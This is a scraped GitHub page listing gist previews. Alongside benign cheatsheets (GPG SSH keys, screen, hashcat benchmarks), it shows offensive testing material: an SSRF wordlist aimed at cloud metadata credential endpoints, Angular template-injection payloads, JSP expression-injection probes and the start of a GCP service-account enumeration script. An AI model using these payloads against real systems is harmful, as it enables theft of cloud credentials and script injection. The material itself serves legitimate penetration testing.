Skip to content

Instantly share code, notes, and snippets.

View Sw4mpf0x's full-sized avatar

Andrew Luke Sw4mpf0x

71 followers · 0 following
View GitHub Profile
@andrewlkho
andrewlkho / gist:7373190
Last active September 28, 2025 15:17
How to use authentication subkeys in gpg for SSH public key authentication

GPG subkeys marked with the "authenticate" capability can be used for public key authentication with SSH. This is done using gpg-agent which, using the --enable-ssh-support option, can implement the agent protocol used by SSH.

Requirements

A working gpg2 setup is required. It may be possible to use gpg 1.4 but with gpg-agent compiled from gpg2. If you are using OS X 10.9 (Mavericks) then you may find the instructions [here][1] useful.

@jctosta
jctosta / screen_cheatsheet.markdown
Last active November 27, 2025 13:51
Screen Cheatsheet

Screen Quick Reference

Basic

Description Command
Start a new session with session name screen -S <session_name>
List running sessions / screens screen -ls
Attach to a running session screen -x
Attach to a running session with name screen -r
@apolloclark
apolloclark / aws cli cheatsheet.md
Last active October 24, 2025 04:26
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active November 26, 2025 00:24
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@epixoip
epixoip / 8x1080.md
Last active November 7, 2025 09:47
8x Nvidia GTX 1080 Hashcat Benchmarks
@mccabe615
mccabe615 / AngularTI.md
Last active September 16, 2025 13:51
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@briangershon
briangershon / gist:fa9feb08e6a65d52bdc35c738d8cf104
Created January 8, 2017 07:57
Log Request Body for Debugging (golang)
buf, bodyErr := ioutil.ReadAll(r.Body)
if bodyErr != nil {
log.Print("bodyErr ", bodyErr.Error())
http.Error(w, bodyErr.Error(), http.StatusInternalServerError)
return
}
rdr1 := ioutil.NopCloser(bytes.NewBuffer(buf))
rdr2 := ioutil.NopCloser(bytes.NewBuffer(buf))
log.Printf("BODY: %q", rdr1)
@FrankSpierings
FrankSpierings / README.md
Last active November 4, 2025 21:29
Linux Container Escapes and Hardening
@arbazkiraak
arbazkiraak / jsp-jstl-intruders.txt
Last active April 24, 2023 02:06
wordlist generated Based on : https://medium.com/@adrien_jeanneau/how-i-was-able-to-list-some-internal-information-from-paypal-bugbounty-ca8d217a397c
${0 }
${0 == pageList.maxPage}
${1}
${1 eq currentPageNumber }
${5}
${5/6}
${a+1 }
${a.academyName}
${a.academyNumber}
${academyNumber==a.academyNumber}
@carnal0wnage
carnal0wnage / gcp_enum.sh
Last active January 24, 2024 18:06
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
project="my-project"
space=""
echo "gcloud auth list"
gcloud auth list
echo -e "$space"